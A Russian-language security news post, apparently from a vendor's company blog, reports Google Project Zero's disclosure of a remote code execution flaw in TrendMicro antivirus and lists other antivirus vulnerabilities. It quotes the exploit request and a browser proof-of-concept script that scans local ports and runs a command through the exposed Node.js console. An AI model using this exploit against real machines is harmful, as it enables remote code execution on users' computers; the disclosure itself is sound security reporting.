Критическая уязвимость в антивирусе TrendMicro позволяет осуществлять удаленное выполнение кода

в 9:11, , рубрики: TrendMicro, антивирусы, Блог компании Positive Technologies, информационная безопасность, уязвимости

Критическая уязвимость в антивирусе TrendMicro позволяет осуществлять удаленное выполнение кода - 1

Исследователь из команды Google Project Zero Тэвис Орманди (Tavis Omandy) опубликовал информацию о критической уязвимости в антивирусе TrendMicro. Как выяснил эксперт, ошибка в коде программного продукта приводила к запуску отладочной консоли Node.js — с его помощью злоумышленники могли отправлять команды для удаленного исполнения на компьютеры с установленным антивирусом. Сам Орманди в своем сообщении назвал ошибку «нелепой».

Для эксплуатации уязвимости злоумышленнику нужно отправить запрос вида:

http://localhost:50820/json/new/?javascript:require('child_process').spawnSync('calc.exe')

Орманди также написал код простого экслоита:

<script>
var port        = 49152;
var maxport     = 60000;
var concurrent  = 128;

function nextPort()
{
    var img = document.createElement('IMG');
    img.alt = "Testing " + port + "...";
    img.src = "http://127.0.0.1:
            + port++
            + "/json/new/?"
            + "javascript:require('child_process')"
            + ".spawnSync('calc.exe')";

    img.onload = img.onerror = function(e) {
        document.body.removeChild(e.target);
        nextPort();
    }

    if (port < maxport) {
        document.body.appendChild(img);
    }
}

for (i = 0; i < concurrent; i++)
    nextPort();

</script>

Критическая уязвимость в антивирусе TrendMicro позволяет осуществлять удаленное выполнение кода - 2

Сообщение исследователя появилось 22 марта, а чуть более недели спустя, 30 марта компания выпустила патч, который частично закрывает ошибку — ее не удалось устранить полностью, однако были решены «наиболее критичные проблемы».

Кроме того, компания выпустила заявление, в котором рассказала, что ошибке подвержены только «потребительские» продукты, а не технологии для корпоративных заказчиков. Текст заявления приводит британское издание The Register.

За последний год это уже не первый случай обнаружения серьезных уязвимостей в защитном программном обеспечении и атак на антивирусные компании. В начале февраля 2016 года тот же исследователь Тэвис Орманди обнаружил серьезные уязвимости в антивирусном продукте Malwarebytes. Обновления Malwarebytes Antivirus не были подписаны с помощью цифровой подписи компании и загружались по незащищенному HTTP-соединению — это делало пользователей подверженными MiTM-атакам.

Кроме того, ранее в июне 2015 года в СМИ попала информация о том, что британские и американские спецслужбы искали уязвимости продуктах «Лаборатории Касперского». Примерно в то же время исследователи из Google Project Zero рассказали о серьезной уязвимости в антивирусе ESET NOD32, которая позволяла атакующему читать, модифицировать и удалять любые файлы на компьютерах, на которых установлен антивирус.

Летом того же года стало известно о том, что в продукте Symantec Endpoint Protection обнаружен целый ряд серьезных уязвимостей, которые позволяли атакующим осуществлять обход аутентификации, повышения привилегий, чтение и запись файлов, а также осуществления SQL-инъекций. Кроме того, практически одновременно с этим было объявлено о том, что антивирусная компания BitDefender стала жертвой хакерской атаки, в результате которой были похищены пароли пользователей, которые хранились в открытом виде.

Позднее осенью 2015 года серьезные ошибки безопасности были обнаружены в криптософте TrueCrypt, а еще спустя несколько месяцев, в декабре того же года критические уязвимости были также найдены в антивирусе Avast.

Кроме того, осенью прошлого года исследователь безопасности Мазин Ахмед опубликовал исследование, в ходе которого ему удалось обнаружить XSS-уязвимости сразу в нескольких популярных межсетевых экранах. Мы проверили самообучающийся межсетевой экран PT Application Firewall на подверженность описанным в работе обходам защиты — все представленные способы обхода были заблокированы экраном.

Для предотвращения возможных проблем, связанных с безопасностью инструментов защиты, также можно использовать средства, позволяющие изолировать подобные решения от других систем, сохранив их функциональность. Решать эту задачу, к примеру, может cистема выявления вредоносных файлов и ссылок PT MultiScanner.

Автор: Positive Technologies

Источник


* - обязательные к заполнению поля


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js